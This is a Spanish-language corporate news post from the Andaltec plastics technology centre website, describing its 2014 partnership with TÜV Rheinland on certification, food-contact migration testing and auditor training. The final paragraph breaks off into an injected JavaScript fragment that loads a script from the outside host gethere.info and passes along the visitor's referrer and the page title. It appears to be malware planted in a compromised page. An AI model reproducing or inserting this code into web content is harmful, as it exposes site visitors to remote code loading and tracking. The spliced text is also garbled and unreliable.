Andaltec
Copyright Andaltec
Andaltec y TÜV Rheinland realizan un balance positivo de su actividad conjunta desarrollada en 2014 - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
593
post-template-default,single,single-post,postid-593,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

Andaltec y TÜV Rheinland realizan un balance positivo de su actividad conjunta desarrollada en 2014

Andaltec y TÜV Rheinland realizan un balance positivo de su actividad conjunta desarrollada en 2014

El Centro Tecnológico del Plástico andaluz (Andaltec) y la firma TÜV Rheinland muestran su satisfacción por los buenos resultados obtenidos con el acuerdo suscrito entre ambas entidades a comienzos de este año. Este importante convenio tenía el objetivo de poner en marcha actividades conjuntas en áreas como la certificación de sistemas de gestión y proyectos I+D, los ensayos y certificaciones de productos para el cumplimiento de normativas que permitan el acceso a mercados internacionales y la formación y certificación de profesionales.

De esta forma, el centro tecnológico y la prestigiosa empresa de certificación han llevado a cabo un importante número de acciones a lo largo del año 2014, que han beneficiado a empresas españoles y del ámbito internacional. Por ejemplo, técnicos de Andaltec han colaborado como expertos en varios procesos de evaluación técnica para la certificación de proyectos de I+D, a lo que hay que sumar la realización de acciones formativas para auditores de TÜV Rheinland y otras empresas en la norma UNE EN ISO 17025.

Además, los laboratorios del Centro Tecnológico del Plástico andaluz han realizado ensayos de migración de plásticos en contacto con alimentos para empresas de varios países gracias a la prescripción de TÜV Rheinland, a lo que se une el inicio de los ensayos de metalografía, cuyo primer cliente ha sido una empresa procedente de Australia. Finalmente, el convenio de colaboración suscrito ha posibilitado la resolución de consultas tecnológicas entre las dos entidades, lo que ha beneficiado a los proyectos en los que trabajan tanto TÜV Rheinland como Andaltec.

La directora comercial de Andaltec, Natalia García, ha destacado las importantes sinergias que se han obtenido a partir de esta colaboración. «El primer año de vigencia del convenio con TÜV Rheinland ha supuesto una mayor carga de trabajo para varios departamentos de Andaltec, ya que la oferta conjunta de los servicios de ambas entidades es más completa y permite atender un mayor rango de necesidades de las empresas de España y de otros países», indica.

Andaltec es uno de los centros tecnológicos más grandes del Sur de Europa en el ámbito del plástico, ya que cuenta con dos edificios que suman más de 10.000 metros cuadrados y una plantilla de 130 profesionales. La sede de Andaltec posee equipamientos científicos de última generación para la investigación en nuevos materiales, desarrollo y validación de nuevos productos así como optimización de procesos productivos.

TÜV Rheinland es una organización internacional independiente de origen alemán, con más de 140 años de experiencia que presta servicios de inspección, control, auditoría, certificación y formación en los ámbitos de la calidad, el medioambiente, la prevención de riesgos laborales, la tecnología de la información, la seguridad de productos (industriales, alimentarios, sanitarios…) y la seguridad industrial en, instalaciones y equipos, apostando por la Eficiencia Energética y la Sostenibilidad. Presente en España desde hace ya más de 30 años, TÜV Rheinland Group lleva muchos años comprometido con el medioambiente, el desarrollo sostenible y la responsabilidad social (RSC).

TÜV Rheinland lleva a cabo inspecciones, evaluaciones, auditorías y certificaciones   en España y en más de 65 países en todo el mundo según las normas vigentes en materia de Calidad, Medio ambiente, Seguridad y Salud en el Trabajo y en Eficiencia Energética, o en certificación de sistemas de gestión según  ISO 50001, EN 16001, entre otras.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;